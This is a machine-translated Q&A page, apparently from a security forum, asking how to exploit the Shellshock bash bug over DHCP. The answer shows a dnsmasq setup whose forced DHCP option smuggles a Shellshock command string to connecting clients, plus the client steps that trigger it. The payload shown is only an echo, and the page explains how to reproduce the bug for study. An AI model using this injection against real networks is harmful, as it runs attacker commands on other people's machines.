shellshock dhcp exploit

1

Un atacante puede explotar el error de bash en el protocolo DHCP. En la búsqueda, cómo se puede realizar esto, encontré " enlace ", pero no se pudo encontrar ningún tutorial que lo muestre en la máquina Linux.

Explique cómo se puede utilizar para atacar a los clientes que utilizan el servidor dhcp en Linux. ¿Qué configuraciones deben hacerse en el servidor dhcp?

    
pregunta jonny789 03.10.2014 - 08:17
fuente

1 respuesta

8

Para reproducir esta vulnerabilidad en los sistemas * nix, siga estos pasos:

  • Instala dnsmasq. En la máquina Ubuntu se puede hacer ejecutando el siguiente comando:

    sudo apt-get install dnsmasq
    
  • Agregue las siguientes líneas al archivo de configuración /etc/dnsmasq.conf :

    interface="iface_server"
    
    dhcp-range="ip_start","ip_end",12h
    
    dhcp-option-force=100,() { :; }; echo 'You are going to be shocked..ShellShock !!!'>/tmp/
    

    El código vulnerable se insertará en el campo dhcp-option del encabezado.

    ¿Dónde está la interfaz de red? El servidor DHCP escuchará, y ip_start , ip_end es el rango de direcciones IP que dará el servidor.

  • En la máquina de destino, verifique que una interfaz esté configurada para usar el cliente DHCP. Se puede hacer mirando el / etc / network / interfaces file .

    Las siguientes líneas deben estar en el archivo:

    auto "iface_client"
    
    iface "iface_client" inet dhcp
    
  • En la máquina vulnerable, ingrese el siguiente comando:

    sudo ifdown "iface_client" && sudo ifup "iface_client"
    

    Donde iface_client es la interfaz de red, el cliente DHCP adquirirá la dirección IP para.

Tenga en cuenta que iface_server y iface_client deben estar conectados a la misma red.

    
respondido por el P4cK3tHuNt3R 03.10.2014 - 08:25
fuente

Lea otras preguntas en las etiquetas